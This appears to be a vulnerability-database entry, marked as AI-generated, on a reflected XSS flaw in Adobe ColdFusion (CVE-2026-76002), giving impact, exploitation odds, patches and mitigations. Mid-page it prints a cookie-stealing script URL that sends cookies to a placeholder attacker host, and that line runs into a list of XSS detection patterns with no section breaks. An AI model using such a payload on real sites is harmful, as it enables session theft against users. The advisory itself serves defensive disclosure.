
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-76002 is a reflected Cross-Site Scripting (XSS) vulnerability in Adobe ColdFusion that allows unauthenticated attackers to execute arbitrary JavaScript in a victim's browser by convincing them to visit a crafted malicious URL. The vulnerability affects ColdFusion 2025 (update 12 and earlier) and ColdFusion 2023 (update 23 and earlier); versions 13 (ColdFusion 2025) and 24 (ColdFusion 2023) and later are unaffected. Adobe disclosed and patched the vulnerability on September 8, 2026, via security advisory APSB26-119. It carries a CVSS v3.1 base score of 6.1 (Medium), with changed scope reflecting potential cross-origin impact (Adobe Advisory, GitHub Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), arising from insufficient sanitization of user-controlled input that is reflected back in HTTP responses without proper encoding. An attacker crafts a malicious URL containing embedded JavaScript payloads targeting a vulnerable ColdFusion page; when a victim clicks the link, the server reflects the unsanitized input into the browser's rendered page, causing script execution in the victim's browser context. Exploitation requires no authentication and no special privileges, but does require user interaction (victim must visit the attacker-controlled URL). The changed scope indicator means the injected script can affect resources beyond the vulnerable ColdFusion component itself (Adobe Advisory, GitHub Advisory).
Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript within the victim's browser session, enabling session hijacking, credential theft, phishing overlays, or unauthorized actions performed on behalf of the victim. The changed scope means the attacker's script may access resources or data from other origins or components beyond the vulnerable ColdFusion page itself. Availability is not directly impacted, but confidentiality and integrity are both partially compromised through potential exposure of session tokens, cookies, or sensitive page content (Adobe Advisory, GitHub Advisory).
As of the disclosure date, there is no public proof-of-concept exploit code and no evidence of active in-the-wild exploitation (Adobe Advisory). The EPSS score is approximately 0.729%, placing it in the 52nd percentile for exploitation probability within 30 days (GitHub Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, and no threat actor attribution has been reported. The NVD SSVC assessment classifies exploitation as "none" and the attack as non-automatable due to the required user interaction.
https://target.example.com/vulnerable.cfm?param=<script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>.%3Cscript%3E, %3C%2Fscript%3E, javascript:, onerror=, onload=); repeated requests from the same IP with varying payload encodings suggesting active probing.Adobe has released patches addressing this vulnerability: ColdFusion 2025 users should update to Update 13 or later, and ColdFusion 2023 users should update to Update 24 or later, as detailed in advisory APSB26-119 (Adobe Advisory). As additional hardening measures, administrators should implement strict input validation and output encoding for all user-controlled data reflected in responses, deploy Content Security Policy (CSP) HTTP headers to restrict unauthorized script execution, and educate users about the risks of clicking unsolicited or suspicious links. Organizations unable to patch immediately should consider placing ColdFusion applications behind a Web Application Firewall (WAF) configured to detect and block reflected XSS patterns.
The CIS (Center for Internet Security) issued an advisory noting multiple vulnerabilities in Adobe products patched in September 2026, including this XSS issue, recommending prompt patching (CIS Advisory). FortiGuard Labs included the vulnerability in their IPS update tracking for the same period. No significant independent researcher commentary, social media discussion, or media coverage beyond standard vulnerability aggregation has been observed for this moderate-severity issue.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."